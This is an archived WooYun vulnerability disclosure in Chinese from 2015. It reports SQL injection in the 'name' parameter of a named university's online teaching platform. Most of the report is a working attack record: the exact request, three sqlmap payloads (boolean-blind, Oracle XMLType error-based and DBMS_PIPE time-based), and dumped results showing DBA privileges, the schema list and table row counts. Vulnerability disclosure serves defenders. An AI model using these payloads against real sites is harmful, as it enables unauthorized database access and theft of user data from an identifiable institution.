乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://jxpt.cuc.edu.cn/ THEOL网络教学综合平台-中国传媒大学
GET /resource/jpk/search.jsp?applylevel=-1&applyyear=0&coursetype=0&name=-1&subject1=0&subject2=0&university=%cf%c3%c3%c5%b4%f3%d1%a7 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://jxpt.cuc.edu.cnCookie: JSESSIONID=D059636EE102DDE9916439FF47FAC710Host: jxpt.cuc.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
name参数存在注入
qlmap resumed the following injection point(s) from stored session:---Parameter: name (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: applylevel=-1&applyyear=0&coursetype=0&name=-9660' OR 4537=4537 AND 'LLwg' LIKE 'LLwg&subject1=0&subject2=0&university=%cf%c3%c3%c5%b4%f3%d1%a7 Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: applylevel=-1&applyyear=0&coursetype=0&name=-1' AND 5997=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (5997=5997) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'ARap' LIKE 'ARap&subject1=0&subject2=0&university=%cf%c3%c3%c5%b4%f3%d1%a7 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: applylevel=-1&applyyear=0&coursetype=0&name=-1' AND 2605=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(77)||CHR(70)||CHR(85),5) AND 'immB' LIKE 'immB&subject1=0&subject2=0&university=%cf%c3%c3%c5%b4%f3%d1%a7---web application technology: Apache 2.2.29, JSPback-end DBMS: Oraclecurrent user: 'RESV2'current schema (equivalent to database on Oracle): 'RESV2'current user is DBA: Trueavailable databases [8]:[*] DBSNMP[*] OUTLN[*] RESV2[*] SYS[*] SYSTEM[*] THEOLENV[*] TSMSYS[*] WMSYS
+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| OPERATION_LOG | 399676 || USER_ROLE | 23467 || SITEVISITCOUNT | 16403 || CLASSIFICATION | 12481 || LIFECYCLE_CONTRIBUTEENTRY | 4948 || LIFECYCLE_CONTRIBUTE | 4946 || GENERAL_KEYWORD | 3974 || ERESOURCE | 2596 || GENERAL | 2596 || LIFECYCLE | 2595 || TECHNICAL | 2594 || GENERAL_IDENTIFIER | 2565 || GENERAL_DESCRIPTION | 2558 || GENERAL_LANGUAGE | 2557 || TECHNICAL_LOCATION | 2556 || RES_JPK | 1881 || USER_VALUE | 1678 || RIGHTS | 1365 || GENERAL_COVERAGE | 922 || DELETED_ERESOURCE | 647 || FORMATVOCB | 607 || CLASSIFICATION_ARCHITECTURE | 448 || THEOL_FILES | 306 || EOL_FTP_LOG | 129 || EDUCATIONAL | 122 || STATISTICBYTIME | 105 || BMFOLDER | 68 || EOL_FTP_FILES | 52 || STATISTICPARAMETER | 23 || BMRESOURCE | 17 || OPERATIONVOCB | 15 || ROLEVOCB | 15 || ITEMTYPEVOCB | 13 || KINDVOCB | 12 || REQUIREMENTTYPEVOCB | 12 || LANGUAGE_COMPARISON | 11 || "MODULE" | 10 || LEARNINGRESOURCETYPEVOCB | 9 || RESSYSTEMSETTING | 7 || DIFFICULTYVOCB | 5 || INTERACTIVITYLEVELVOCB | 5 || NOTEBOOK | 5 || ROLE | 5 || SECRECYVOCB | 5 || SEMANTICDENSITYVOCB | 5 || STRUCTUREVOCB | 5 || AGGREGATIONLEVELVOCB | 4 || CASETYPEVOCB | 4 || CONTEXTVOCB | 4 || INTENDEDENDUSERROLE | 4 || RELATION | 4 || RELATION_DESCRIPTION | 4 || RELATION_IDENTIFIER | 4 || SCORELEVEL | 4 || STATUSVOCB | 4 || AUDIOSAMPLINGVOCB | 3 || IDENTIFIER_CATALOG | 3 || INTERACTIVITYTYPEVOCB | 3 || PURPOSEVOCB | 3 || VIDEOSAMPLINGFORMATVOCB | 3 || COPYRIGHTVOCB | 2 || COSTVOCB | 2 || ITEMCATEGORYVOCB | 2 || QUANTIZATIONVOCB | 2 || REQUIREMENTKINDVOCB | 2 || TESTCATEGORYVOCB | 2 || TRACKVOCB | 2 || VERSIONTYPEVOCB | 2 || CUSTOMIZE_COLLECTION | 1 || EDU_EXTENSION | 1 || EOL_FTP_ROLESETTING | 1 |+-----------------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-12-01 15:04
漏洞Rank:4 (WooYun评价)
暂无